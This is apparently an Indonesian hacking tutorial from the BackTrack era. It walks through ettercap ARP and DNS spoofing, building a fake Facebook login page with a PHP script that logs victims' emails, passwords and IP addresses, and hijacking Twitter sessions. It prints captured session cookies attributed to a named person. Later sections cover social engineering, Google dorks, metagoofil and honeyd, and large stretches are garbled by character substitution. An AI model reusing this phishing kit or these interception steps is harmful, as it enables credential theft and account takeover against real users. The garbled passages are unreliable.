uufjjeiisjau INFO: https://accounts.google.com/ServiceLogin?
service=mail&passive=true&rm=false&continue=http://mail.google.
com/mail/&scc=1&ltmpl=default&ltmplcache=2
2.2. Spoofing Plugin
Spoofing adalah salah satu tehnik MITM yang mengalihkan traffik dari jalur
sebenarnya menuju kepada alamat yang di tentukan. Intinya Attacker akan memaksa
target menuju pada alamat yang ditentukan attacker dengan menggantikan alamat
sebenarnya yang dituju target.
Ettercap memiliki plugin untuk melakukan jenis serangan MITM ini.
Lakukan nmap scanning seperti yang sudah saya contohkan di awal artikel ini.
Setelah kita telah mendapatkan informasi network pastikan kita mengaktifkan ip
forwarding pada mesin attacker.
Untuk mengaktifkan ip forwarding
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
Kemudian config jalur yang akan di spoof nantinya yang di konfigurasikan pada file
etter.dns. Lokasi file etter.dns secara default pada backtrack V R1
/usr/local/share/ettercap/etter.dns
Uncommand atau ganti baris ini dengan domain yang hendak di spoof ipnya.
facebook.com A 192.168.1.6
*.facebook.com A 192.168.1.6
www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are
not allowed
Edit ip address dengan ip address pengganti , dalam hal ini saya menggunakan ip
address yang di gunakan os backtrack yaitu 192.168.1.6, dan hasilnya akan
mengarahkan domain facebook.com dan www.facebook.com ke ip address
192.168.1.6
Syntax ettercap dengan plugin dns_spoof
ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
-P = plugin
saya coba spoof ke gmail.com dengan ip 192.168.1.6
Hasil Output
Hasil ping pada target host
Perhatikan hasil ping pada host target, ternyata domain www.gmail.com telah di
arahkan ( spoofed ) ke 192.168.1.6 Berhubung saya mengaktifkan apache web server
( localhost server ) maka ketika host target membuka gmail.com melalui browser ,
browser akan membuka halaman localweb saya yang terdapat pada alamat
192.168.1.6
3 PHISSING ATTACK ( FAKELOGIN )
3.1. Pengertian Phissing
Pengertian phissing di sini sebenarnya adalah memalsukan sebuah halaman login
suatu situs tertentu , dengan harapan agar korban tertipu kemudian memasukan
sebuah login user name serta password yang
akan di tercatat pada sebuah file log. Modus ini biasanya di barengi dengan tehnik
spoffing address yang akan mengalihkan alamat sebenarnya menuju ke alamat yang
sudah di siapkan fakelogin tersebut.
Halaman palsu ( fakelogin ) yang profesional biasanya akan mengarahkan korban ke
halaman gagal login pada alamat yang sah, setelah korban mengisikan user name
dan password kemudian mensubmitnya , sehingga korban tidak akan curiga bahwa
dia sedang di mata-matai!!! Biasanya situs-
situs berbasis jejaring sosial
3.2. Metode Metode Serangan Phissing
Ditinjau dari media serangan
1. Local Area Network
Serangan melalui Local area network ( LAN ) baik secara wired maupun wireless.
Serangan phissing yang menginfeksi dengan media ini , biasanya memulai serangan
phissing tersebut di mulai dari serangan spoofing sebagai pembuka serangan.
Attacker biasanya men-spoof terlebih dahulu alamat situs yang di target dan
menaruh halaman login palsu ( fakelogin ) pada localhost attacker. Kemudian
melanjutkan dengan serangan arpspoof yang membelokan trafik router ke situs asli
menuju ke fakelogin yang telah disiapkan di dalam localhost attacker.
2. NAT
Serangan phissing dengan memanfaatkan media NAT, dengan memanfaatkan dua
tipe.
2.1. Serangan phissing dengan memanfaatkan human error .
Attacker memiliki pengharapan agar target memiliki human error dengan membuat
domain yang hampir sama dengan situs asli, sehingga korban yang tidak hati-hati
akan tertipu. Misalnya pacebook.tk , pacebook.com yang hampir sama dengan nama
situs aslinya facebook.com. Attacker berharap target terkecoh dengan miripnya
domain yang berisi fakelogin
2.2. Serangan yang di kombinasikan dengan social enggineering
Attacker akan memanfaatkan metode pendekatan untuk memasukan virus, mengirim
fake email , pemanfaatan lawan jenis , dll . Metode serangan social enggineering
akan di bahas pada pertemuan pertemuan training berikut.
3.3. Membuat Halaman login palsu ( fakelogin )
Membuat halaman login sebenarnya tidak sesulit yang di perkirakan orang. Cukup
dengan memodif situs yang asli.
Contoh :
Membuat fakelogin facebook
Langkah-langkahnya
1. Mengambil file index palsu dari situs target
Langkah pertama kita harus memiliki halaman index yang sama persis. Buka dengan
browser http://facebook.com kemudian save dengan nama index.html.
2. Edit file index.html
Setelah di download kita harus edit file tersebut. Buka pake editor kesayangan anda.
Sebagai contoh saya pake gedit.
{~}: gedit index.html
kemudian cari kata action dengan menggunakan fasilitas search pada editor text.
Kemudian ganti dengan kata post.php . Lalu save dengan nama index.php.
3. Buatlah sebuah file php. Kita beri nama post.php sesuai dengan penggantian
pada langkah sebelumnya.
Isi file tersebut dengan code di bawah ini
<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++
++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++
++++++");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!
window.location=\"https://login.facebook.com/login.php?
login_attempt=1\";
//
</script>";
?>
4. Kemudian kita buat file logs.txt yang nantinya akan di gunakan untuk mencatat
hasil dari input user dan password dari fakelogin.
5. Pindahkan ketiga file tersebut , index.php, post.php, log.txt ke directori
localhost.
Pada backtrack secara default ada pada /var/www mengingat backtrack
menggunakan apache2 sebagai localhostnya.
6. Aktifkan apache2
root@bt # /etc/init.d/apache2 start
7. Kemudian attacker akan melanjutkan serangan lewat arpspoof sehingga
situs facebook.com akan mengarah kepada ip localhost attacker
). COOKIES HI0ACKING
).$ Pen1ertian session 2i;ackin1
Da%a- i%-. k,-2.ter> c,,kies hijacki#$ ata. sessi,# hijacki#$ a&a%ah eks2%,itasi
&ari se/.ah !a%i& sessi,# ka&a#$ j.$a &ise/.t Isession keyJ Yait. &e#$a# t.j.a#
.#t.k -e#&a2atka# akses "a#$ ti&ak sah ke i#+,r-asi ata. jasa &a%a- s.at. siste-
k,-2.ter. Secara kh.s.s> -er.j.k 2a&a 2e#c.ria# c,,kie "a#$ &i$.#aka# .#t.k
-e#$,te#tikasi 2e#$$.#a ke ser!er. +ookie ?((- &i$.#aka# .#t.k -e#ja$a
sesiAsessi,# 2a&a /a#"ak sit.s <e/ &a2at &e#$a# -.&ah &ic.ri ,%eh attacker
-e#$$.#aka# -esi# 2era#tara ata. &e#$a# akses 2a&a c,,kie "a#$ &isi-2a# 2a&a
k,-2.ter k,r/a#. Baik%ah .#t.k -e#$erti %e/ih ja.h -e#$e#ai sessi,# hijacki#$ >
se/aik#"a kita -e#$erti a2a it. sesi &a# c,,kies 2a&a 2e%a"a#a# htt2.
C,,kies -er.2aka# &ata +i%e "a#$ &it.%is ke &a%a- har& &isk k,-2.ter ,%eh <e/
ser!er "a#$ /er$.#a .#t.k -e#$i&e#ti+ikasika# &iri .ser 2a&a sit.s terse/.t
sehi#$$a se<akt. .ser ke-/a%i -e#$.#j.$i sit.s terse/.t> sit.s it. aka# &a2at
-e#$e#a%i#"a .ser terse/.t.
8.#$si c,,kies Q
$. Me-/a#t. <e/ site .#t.k I-e#$i#$atJ sia2a kita &a# -e#$at.r
2re+ere#ces "a#$ ses.ai sehi#$$a a2a/i%a .ser ke-/a%i -e#$.#j.#$i <e/
site terse/.t aka# %a#$s.#$ &ike#a%i.
%. Me#$hi%a#$ka# ke/.t.ha# .#t.k -ere$ister .%a#$ &i <e/ site terse/.t
saat -e#$akses %a$i terse/.t @site terte#t. sajaB> c,,kies -e-/a#t. 2r,ses
%,$i# .ser ke &a%a- <e/ ser!er terse/.t.
9. Me-.#$ki#ka# <e/ site .#t.k -e#e%.s.ri 2,%a <e/ s.r+i#$ .ser &a#
-e#$etah.i sit.s +a!,rit "a#$ seri#$ &ik.#j.#$i#"a.
Je#is C,,kies
1. Non persistent (session) cookies. Suatu cookie yang akan hilang sewaktu
user menutup browser dan biasanya digunakan pada shopping carts di
toko belanja online untuk menelusuri item-item yang dibeli,
%. 4ersiste#t c,,kies. Diat.r ,%eh sit.ssit.s 2,rta%> /a##er A -e&ia ik%a# sit.s
&a# %ai##"a "a#$ i#$i# tah. ketika .ser ke-/a%i -e#$.#j.#$i site -ereka.
@-isa% &e#$a# cara -e-/erika# ,2si JRe-e-/er MeJ saat %,$i#B. 8i%e +i%e
i#i tersi-2a# &i har&isk .ser.
Ke&.a ti2e c,,kies i#i -e#"i-2a# i#+,r-asi -e#$e#ai )R, ata. domain name &ari
sit.s "a#$ &ik.#j.#$i .ser &a# /e/era2a k,&e "a#$ -e#$i#&ikasika# ha%a-a# a2a
saja "a#$ s.&ah &ik.#j.#$i. C,,kies &a2at /erisi i#+,r-asi 2ri/a&i .ser> se2erti
#a-a &a# a%a-at e-ai%> Aka# teta2i &a2at j.$a .ser -e-/erika# i#+,r-asi ke
<e/site terse/.t -e%a%.i 2r,ses re$istrasi. De#$a# kata %ai#> c,,kies ti&ak aka#
&a2at ImencuriJ #a-a &a# a%a-at e-ai% kec.a%i &i/erika# ,%eh .ser. Na-.#
&e-ikia#> a&a k,&e terte#t. @-a%ici,.s c,&eB "a#$ &i/.at -isa%#"a &e#$a# Active5
c,#tr,%> "a#$ &a2at -e#$a-/i% i#+,r-asi &ari 4C ta#2a se2e#$etah.a# .ser.
C,,kies .-.-#"a k.ra#$ &ari $>> b7tes sehi#$$a ti&ak aka# -e-2e#$ar.hi
kece2ata# /r,<si#$. teta2i kare#a .-.-#"a /r,<ser &iat.r secara &e+a.%t .#t.k
-e#eri-a c,,kies -aka .ser ti&ak aka# tah. /ah<a c,,kies s.&ah a&a &i k,-2.ter.
C,,kies &a2at /er$.#a ter.ta-a 2a&a sit.s "a#$ -e-er%.ka# re$istrasi> sehi#$$a
setia2 ka%i -e#$.#j.#$i sit.s terse/.t> c,,kies aka# -e%,$i#ka# .ser ta#2a har.s
-e-as.kka# .ser #a-e &a# 2ass<,r& %a$i
Session
A&a%ah 2eri#tah .#t.k 2e#&ek%arasia# !aria/e% $%,/a% "a#$ aka# -e-a#$$i% #i%ai
&ari !aria/e% ts/.
(#t.k -e#$akhiri ata. -e#$ha2.s se-.a !aria/e% sessi,#> kita -e#$$.#aka#
+.#$si sessi,#F&estr," @ B
8.#$si sessi,# &estr," ti&ak -e-er%.ka# ar$.-e# &a%a- 2e#$$.#aa#"a. C,#t,h
2eri#tah -e#$akhiri sessi,# "a#$ &i/.at 2a&a +i%e sessi,# "a#$ &i/.at se/e%.-#"a
).% I56/e5entasi session 2i;ackin1
(#t.k -e%ak.ka# 2e#etrati,# testi#$ &a%a- sisi sessi,# hijacki#$ 2a&a jari#$a#
k,-2.ter tar$et> sa"a aka# -e-akai etterca2 se/a$ai t,,%s "a#$ teri#sta%% secara
&e+a.%t.
Se2erti /iasa kita har.s -e%ak.ka# e&iti#$ 2a&a etter.c,#+ .#t.k 2e#$at.ra#
2e#$at.ra# "a#$ &i /.t.hka# .
root@eichel:~# vim /etc/etter.conf
$a#ti%ah ter%e/ih &ah.%. .ser @.i&B &a# $r,.2@$i&B 2ri!s
[privs]
ec_uid = 0 #65534 nobody is the default
ec_gid = 0 #65534 nobody is the default
(#c,--e#t .#t.k -e#$$.#aka# i2ta/%es 2a&a ,2erasi etterca2
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface
-p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface
-p tcp --dport %port -j REDIRECT --to-port %rport"
Ke-.&ia# sera#$a# 2a&a etterca2 s.&ah &a2at &i -.%ai. (#t.k -e%ak.ka# &.-2
terha&a2 s.at. tra++ik ke%.ar -as.k &ata 2a&a s.at. jari#$a# > kita /isa
-e#$$.#aka# +,r-at
ettercap -T -w testdump -i [ interface ] -M ARP /[ ip-
group-1 ]/ /[ ip-group-2 ]/
Mari kita 2erhatika# hasi% -,&e te1t 2a&a etterca2 &i /a<ah i#i.
root@eichel:~# ettercap -T -w testdump -i wlan0 -M ARP /
192.168.1.1/ //
wlan0 -> F4:EC:38:99:60:F3 192.168.1.5
255.255.255.0
28 plugins
53 ports monitored
2183 known services
* |==================================================>| 100.00
%
GROUP 1 : 192.168.1.1 54:E6:FC:D2:98:6D
Tue Mar 6 22:32:39 2012
TCP 199.59.150.7:443 --> 192.168.1.12:2559 | SA
Tue Mar 6 22:32:39 2012
TCP 192.168.1.12:2559 --> 199.59.150.7:443 | P
Tue Mar 6 22:32:44 2012
TCP 192.168.1.12:2567 --> 199.59.150.7:443 | P
ET /account/bootstrap_data?r=0.7324769652496227 HTTP/1.1.
Host: twitter.com.
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101
Firefox/11.0.
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
.
Accept-Language: en-us,en;q=0.5.
Accept-Encoding: gzip, deflate.
Connection: keep-alive.
Referer: https://twitter.com/.
Cookie: k=10.35.61.127.1331047687371497;
guest_id=v1%3A133104768737439149;
_twitter_sess=BAh7CSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc
2g6OkZsYXNo
%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJWM0NDBhM2U4NTUwMTNiZjM5MWU4Yz
M2%250ANTM3ZGUwMzk3Ogxjc3JmX2lkIiVhYjk3MGZiMGIzMTFlYjRlMzQ1Zjdi
ZjYx%250AMjc4YmQ2ZDoPY3JlYXRlZF9hdGwrCM%252Fkn%252Bg1AQ%253D
%253D--28cafc07f4cb1bb7e63a1d89af8b885dc4281e09;
original_referer=padhuUp37zi4XoWogyFqcGgJdw%2BJPXpx.
Tue Mar 6 22:32:59 2012
TCP 199.59.150.7:443 --> 192.168.1.12:2567 | P
path=/; expires=Mon, 07-Mar-2022 03:32:59 GMT.
Set-Cookie: dnt=; domain=.twitter.com; path=/; expires=Thu, 01-
Jan-1970 00:00:00 GMT.
Set-Cookie: lang=en; path=/.
Set-Cookie: t1=1; domain=.twitter.com; path=/; expires=Thu, 05-
Apr-2012 15:32:59 GMT.
Set-Cookie: twid=u%3D117857762%7CuFIkjuKfB3Mi3SvT3O4Aix73EkI%3D;
domain=.twitter.com; path=/; secure.
Set-Cookie:
_twitter_sess=BAh7DiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc
2g6OkZsYXNo
%250ASGFzaHsABjoKQHVzZWR7ADoJdXNlcmkE4l0GBzoQc3RheV9zZWN1cmVUOh
Nw
%250AYXNzd29yZF90b2tlbiItZWVhNWIyNDUwMzc5YTVjN2RmMjI3ODNhZDRkZj
Yx
%250ANGYxMmI1MmI4YzoTc2hvd19oZWxwX2xpbmswOhtzZXNzaW9uX3Bhc3N3b3J
k
%250AX3Rva2VuIi1lZWE1YjI0NTAzNzlhNWM3ZGYyMjc4M2FkNGRmNjE0ZjEyYj
Uy
%250AYjhjOgdpZCIlYzQ0MGEzZTg1NTAxM2JmMzkxZThjMzY1MzdkZTAzOTc6DGN
z
%250AcmZfaWQiJWFiOTcwZmIwYjMxMWViNGUzNDVmN2JmNjEyNzhiZDZkOg9jcmV
h%250AdGVkX2F0bCsIz%252BSf6DUB--
2b872c1b25160fad66bfa37d55d82a389799397b; domain=.twitter.com;
path=/; HttpOnly.
X-XSS-Protection: 1; mode=b
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
4erhatika# 2e#$$a%a# ,.t2.t etterca2 2a&a ter-i#a% &i atas >/isa a#&a %ihat kita
/erhasi% -e#&a2atka# sessi,# &ari sit.s jejari#$ s,sia% terke#a% t<itter.c,-. Sa"a
se#$aja -e#$a-/i% &.a c,#t,h sesi &e#$a# ' a.the#ti+ikasi. 4a&a hasi% &.-2
c,,kies 2erta-a -asih /er2ri!i%a$e $.est i&> /erarti tar$et -asih -e-/.ka sit.s
t<itter &a# /e%.- -e%ak.ka# %,$i#. Ber/e&a &e#$a# "a#$ &i /a<ah> &i-a#a s.&ah
a&a t<itter i&. (#t.k -e-as.ka# ke&a%a- /r,<ser &a# -e#$$.#aka# hasi% c.ria#
c,,kies> attacker aka# -e#$$.#aka# a&&,#s ata. 2%.$i#2%.$i# terte#t. 2a&a
/r,<ser "a#$ &i$.#aka#.
4a&a c,#t,h ka%i i#i sa"a aka# -e#$a-/i% A&& N E&it C,,kies 2%.$i#> "a#$ /isa
a#&a &,<#%,a& 2a&a ta.ta# &i /a<ah i#i
htt2sQAAa&&,#s.-,Hi%%a.,r$Ae#(SA+ire+,1Aa&&,#Aa&&#e&itc,,kies107:0A
Sete%ah it. /.ka 2%.$i# terse/.t 2a&a -e#. /r,<ser -,&Hi%%a "ait. &i ta/ t,,%s.
Ke-.&ia# ta-/ahka# ata. e&it c,,kies "a#$ -e#$arah ke2a&a t<itter.c,-.
4erhatika# i#+,r-asii#+,r-asi "a#$ har.s kita a-/i% &a# 2asa#$ka# 2a&a c,,kies
e&it,r 2%.$i#.
path=/; expires=Mon, 07-Mar-2022 03:32:59 GMT.
Set-Cookie: dnt=; domain=.twitter.com; path=/; expires=Thu, 01-
Jan-1970 00:00:00 GMT.
Set-Cookie: t1=1; domain=.twitter.com; path=/; expires=Thu, 05-
Apr-2012 15:32:59 GMT.
Set-Cookie: twid=u%3D117857762%7CuFIkjuKfB3Mi3SvT3O4Aix73EkI%3D;
domain=.twitter.com; path=/; secure.
Set-Cookie:
_twitter_sess=BAh7DiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc
2g6OkZsYXNo
%250ASGFzaHsABjoKQHVzZWR7ADoJdXNlcmkE4l0GBzoQc3RheV9zZWN1cmVUOh
Nw
%250AGXNzd29yZF90b2tlbiItZWVhNWIyNDUwMzc5YTVjN2RmMjI3ODNhZDRkZj
Yx
%250ANGYxMmI1MmI4YzoTc2hvd19oZWxwX2xpbmswOhtzZXNzaW9uX3Bhc3N3b3J
k
%250AX2Rva2VuIi1lZWE1YjI0NTAzNzlhNWM3ZGYyMjc4M2FkNGRmNjE0ZjEyYj
Uy
%250AYhhjOgdpZCIlYzQ0MGEzZTg1NTAxM2JmMzkxZThjMzY1MzdkZTAzOTc6DGN
z
%250AcFZfaWQiJWFiOTcwZmIwYjMxMWViNGUzNDVmN2JmNjEyNzhiZDZkOg9jcmV
h%250AdGVkX2F0bCsIz%252BSf6DUB--
2b872c1b25160fad66bfa37d55d82a389799397b; domain=.twitter.com;
path=/; HttpOnly.
X-XSS-Protection: 1; mode=b
Na-e Q a&a%ah #a-a &ari sessi,# > /isa &i%ihat &e#$a# <ar#a hija. 2a&a hasi% ,.t2.t
sessi,# hijacki#$ &i atas.
C,#te#t Q sa"a /eri <ar#a -erah > c,#te#t c,,kies -er.2aka# i#ti i#+,r-asi &ari
c,,kies htt2 "a#$ &isi-2a# &i ser!er t.j.a#.
H,st Q sa"a /eri <ar#a /ir.> -er.2aka# i#+,r-asi h,st &ari ser!er "a#$ -e#er/itka#
c,,kies.
4ath Q sa"a /eri <ar#a k.#i#$> a&a%ah &irekt,ri 2a&a &,-ai# "a#$ &it.j.> te#t. saja
kita /eri IAJ kare#a "a#$ &it.j. a&a%ah htt2QAAt<itter.c,- ta#2a ta-/aha# &irekt,ri
%ai##"a.
Htt2 )#%" Q sa"a /eri <ar#a ji#$$a &a# 2i%ih "es > -e#$ac. &a%a- i#+,r-asi c,,kies
2a&a hasi% &iatas.
Maka se/e%.- &i e&it ata. &i ta-/ahka#> sa"a -e#c,/a -e-/.ka t<itter.c,- &a#
hasi%#"a ta-2i% ha%a-a# t<itter %,$i#.
Da# ketika sa"a /.ka ke-/a%i sete%ah -e#$e&it c,,kies
Terima kasih kepada om cassaprodigy yang telah merelakan
id twitternya untuk menjadi percobaan saya.
"A" (I
GET ACCESS AND PASS!ORD
Oleh : zee eichel
$. SOCIA' ENGINEERING
$.$ . Pen1ertian Socia/ En1ineerin1
4e#$ertia# s,cia% e#$i#eeri#$ &i /er/a$ai
ka%a#$a# -e-a#$ /era$a-> #a-.# sa"a
-e#c,/a .#t.k -e-/a<a a#&a -e#$erti a2a
se/e#ar#"a "a#$ -e#ja&i i#ti &ari teh#ik
hacki#$ "a#$ sa#$at 2,2.%er terse/.t.
S,cia% e#$i#eeri#$ se/e#ar#"a -er.2aka#
s.at. teh#ik hacki#$ &e#$a# -e#$$a%i ata.
-e#cari setia2 i#+,r-asi &etai% &ari k,r/a#
ata. tar$et &i jari#$a# i#ter#et ata. &e#$a#
cara 2e#&ekata# secara 2ers.asi+ sehi#$$a
attacker -e#ca2ai t.j.a##"a.
T.j.a# attacker /iasa#"a /er.2a i#+,r-asi 2ri/a&i se2erti tanggal lahir, nama istri ,
hobby "a#$ #a#ti#"a aka# &i $.#aka# se/a$ai /aha# E /aha# 2a&a a2%ikasi hacki#$
se/e#ar#"a. Se2erti %ist 2ass<,r& .#t.k /r.te+,rci#$ > Bahka# attacker aka#
-e#$a-/i% se-.a &,k.-e# "a#$ &i a#$$a2 2er%. .#t.k -e#cari ce%ah E ce%ah
rahasia 2er.sahaa# ata. i#&i!i&.a% $.#a -e%a#carka# aksi jahat#"a.
S,cia% e#$i#eeri#$ %e/ih -e#cari ce%ah 2a&a +akt,r .ta-a "a#$ sa"a se/.t &e#$a#
Ihumanity 0eaknessJ &i -a#a <a%a. seca#$$ih a2a2.# s.at. siste- kea-a#a#
terka&a#$ +akt,r ke%e-aha# -a#.sia &a2at -e-/.at s.at. keha#c.ra# /esar.
Ke%e-aha# -a#.sia "a#$ ter&iri &ari +akt,r %e#$ah> %.2a> ter%a%. si/.k> 2a#&a#$
e#te#$> -e-/.at s.at. h,%e "a#$ sa#$at /esar.
$.%. Penera6an Socia/ En1ineerin1
4e#era2a# SE &e#$a# -e#$$.#aka# /acktrack ,s se/e#ar#"a ti&ak ter%a%. s.%it. Kita
har.s -e#$$.#aka# /e/era2a t,,%s "a#$ &i $.#aka# .#t.k Q
1. Pengumpulan informasi
. Membuat password list untuk bruteforcing
!. Phissing
". sekusi !arget
$.%.$. Pen14n64/an in3or5asi ? in3or5ation 1at2erin1 @
Se2erti 2a&a 2erte-.a# se/e%.-#"a kita s.&ah -e-2e%ajari te#ta#$ 2e#$$.#aa#
/e/era2a t,,%s "a#$ /er$.#a .#t.k -e#cari i#+,r-asii#+,r-asi tar$et
$.%.%. Goo1/e Hackin1
$,,$%e hacki#$ se/e#ar#"a a&a%ah suatu
tehnik mencari informasi mengenai target
menggunakan search engine. *#ter#et search
e#$i#e se/e#ar#"a -er.2aka# s.at. t,,%s
"a#$ sa#$at /erhar$a kare#a /a#"ak
i#+,r-asi "a#$ secara se#$aja -a.2.# ti&ak
se#$aja &i -as.ka# &i &a%a-#"a. Sehi#$$a
attacker -e-a#+aatka# teh#ik i#i .#t.k
-e#$$a%i &ata' terse-/.#"i &i &a%a-#"a. Teh#ik $,,$%e hacki#$ /iasa#"a
-e#$$.#aka# stri#$ ata. search ,2erat,r kh.s.s &e#$a# !aria#!aria# "a#$ &i ke#a%
&e#$a# #a-a I&,rkJ
Searc2 o6erator c2eat s2eet
=e/ Search Q allinanc8or%> allinte;t%> allintitle%> allinurl%>
cac8e%> de"ine%> "iletype%> id%> inanc8or%> in"o%> inte;t%>
intitle%> inurl%> link%> p8onebook%> related%> site%
*-a$e Search Q allintitle%> allinurl%> "iletype%> inurl%>
intitle%> site% Gr,.2s allinte;t%> allintitle%> aut8or%> group%>
insubHect%> inte;t%> intitle%
Direct,r" Q allinte;t%> allintitle%> allinurl%> e;t%> "iletype%>
inte;t%> intitle%> inurl%
Ne<s Q allinte;t%> allintitle%> allinurl%> inte;t%> intitle%>
inurl%> location%> source%
4r,&.ct Search Q allinte;t%> allintitle%
a//inanc2or
Search ,2erat,r i#i &i 2er$.#aka# .#t.k -e#cari se-.a i#+,r-asi 2a&a <e/site
"a#$ ter&a2at 2a&a a#ch,r te1t.
C,#t,h 2e#$$.#aa# Q allinanchorDEee6eichel
a//inte<t
Search ,2erat,r i#i /er+.#$si .#t.k -e#cari se-.a t.%isa# &i &a%a- 2a$e <e/
C,#t,h Q allintextDEee6eichel
a//intit/e
Search ,2erat,r "a#$ /er+.#$si .#t.k -e#cari i#+,r-asi "a#$ ter&a2at &i&a%a- tit%e
2a&a hea&er <e/site
C,#t,h Q allintitleDEee eichel
a//in4r/
Search ,2erat,r "a#$ /er+.#$si .#t.k -e#cari i#+,r-asi "a#$ ter&a2at &i j.&.%
artike% ata. #a-a a%a-at terte#t.
C,#t,h Q allinurlDEee eichel
a4t2or
Me#cari artike%artike% ata. t.%isa# ses.ai &e#$a# a.th,r "a#$ &i te#t.ka#
C,#t,h Q author D Eee eichel
cac2e
Me#a-2i%ka# i#+,r-asi i#&e1i#$ ata. cache terakhir &ari $,,$%e 2a&a <e/site
terte#t.. Ja#$a# -e#eka# s2asi &a%a- 2e#$,2rasia# i#i.
C,#t,h Q cacheD000!indonesianbactrack1or1id
de3ine
&i $.#aka# .#t.k -e#cari i#+,r-asi te#ta#$ &e+i#isi ata. 2e#$ertia# 2a&a kata "a#$
&i -as.ka#
c,#t,h Q defineDbacktrack
3i/et76e
&i $.#aka# .#t.k -e#cari +i%et"2e terte#t. /er&asarka# s.++i1
c,#t,h Q backtrack filetypeDpdf
6en14naan I dan 6en11ab4n1an bebera6a T4er7
/e/era2a U.er" &a2at kita $a/.#$ka# -e#ja&i sat. .#t.k -e#&a2atka# hasi% "a#$
%e/ih &etai%
c,#t,h Q inurlDbacktrack filetypeDpdf
Kita j.$a /isa -e#a-/ahka# ,2era#& Z .#t.k -e#a-/ah stri#$ U.er"
c,#t,h Q inurlDbacktrack 4 Eee eichel
-e#cari kata /acktrack 2a&a .r% "a#$ /erkaita# &e#$a# Hee eiche%
en114nakan T4er7 1oo1/e strin1 4nt4k in3or5ation 1at2erin1
C,#t,h Q siteQi#&,#esia#/acktrack.,r.i&
Stri#$ terse/.t aka# -e#a-2i%ka# i#+,r-asi "a#$ ha#"a -e#$ac. 2a&a sit.s "a#$
&ii#$i#ka# .. ata. /isa kita %e#$ka2i %a$i &e#$a#
+i%et"2eQ2&+ siteQi#&,#esia#/acktrack.,r.i&
Maka 2eri#tah terse/.t aka# -e#cari +i%e /erti2e 2&+ "a#$ a&a 2a&a sit.s "a#$
&ii#$i#ka#
$.%.9. eta1oo3i/
Pen1ertian
Meta$,,+i% a&a%ah t,,%s "a#$ &i$.#aka# .#t.k -e#cari ata.
-e#$.-2.%ka# i#+,r-asi /er&asarka# ti2e &,k.-e#t &ari
sit.s terte#t. "a#$ te%ah &i i#&e1i#$ ,%eh $,,$%e
Pen114naan eta1oo3i/
%a#$kah%a#$kah 2e#$$.#aa# -eta$,,+i%
$.%.9.$. director7 5eta1oo3i/
2a&a /acktrack secara &e+a.%t -eta$,,+i% /era&a 2a&a &irect,r"
!pentest!enumeration!google!metagoofil
&a2at kita akses &e#$a# -e#$$.#aka# 2eri#tah
root@zee-IBTeam:~# cd /pentest/enumeration/google/metagoofil
$.%.9.%. e54/ai ? esek4si @ 5eta1oo3i/
root@bt://pentest/enumeration/google/metagoofil# ls
COPYING hachoir_core lib pdfminer
unzip.pyc
discovery hachoir_metadata LICENSES processor.py
downloader.py hachoir_parser metagoofil.py processor.pyc
downloader.pyc htmlExport.py myparser.py README
extractors htmlExport.pyc myparser.pyc unzip.py
root@bt://pentest/enumeration/google/metagoofil# python
metagoofil.py
*************************************
* Metagoofil Ver 2.1 - *
* Christian Martorella *
* Edge-Security.com *
* cmartorella_at_edge-security.com *
* Blackhat Arsenal Edition *
*************************************
Metagoofil 2.1:
Usage: metagoofil options
-d: domain to search
-t: filetype to download
(pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
-l: limit of results to search (default 200)
-h: work with documents in directory (use "yes"
for local analysis)
-n: limit of files to download
-o: working directory
-f: output file
Examples:
metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o
microsoftfiles -f results.html
metagoofil.py -h yes -o microsoftfiles -f results.html (local
dir analysis)
$.%.9.9. T4er7 strin1 5eta1oo3i/
metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o
microsoftfiles -f results.html

&e#$a# -e%ihat c,#t,h &i atas &a2at kita te#t.ka# -asi#$-asi#$ stri#$ U.er"
+d &iisika# &e#$a# .r% tar$et @ &,-ai# B > +t &i isika# &e#$a# t"2e &,k.-e# "a#$ &i
cari > +/ %i-it &ari j.-%ah 2e#caria# > +n %i-it &ari &,<#%,a& +i%e > +o &irect,r" &i
-a#a kita -e#"i-2a# hasi% &,<#%,a& &,k.-e#> +3 a&a%ah hasi% &ari aksi "a#$
tersi-2a# &a%a- /e#t.k ht-%
kita j.$a &a2at -e#$$.#aka# t,,%s i#i .#t.k -e#$.-2.%ka# &ata 2a&a +,%&er %,ka%
metagoofil.py -h yes -o microsoftfiles -f results.html (local
dir analysis)
%,ca% &ir &i isika# %,ca% &ir kita .
$.%.). Hone7d
h,#e"& a&a%ah s-a%% &ae-,# "a#$ r.##i#$ &i %i#.1 &a# <i#&,<s. T,,%s i#i /er$.#a
.#t.k -e-/.at -.%ti2%e !irt.a% h,#e"s2,t. H,#e"& &a2at -e-a#i2.%asi ser!ice
2r,t,k,% se2erti F(-, ?((-> &a# *&(- &a# &a2at -e-/.at .**9. !irt.a% i2
a&&ress. H,#e"& s.22,rt terha&a2 sca##er se2erti nmap &a# 5probe fingerprinting.
Da# /er/a$ai te-2%ate ,2erati#$ s"ste- &a# +i#$$er2ri#ti#$ &a2at &i %ihat &i
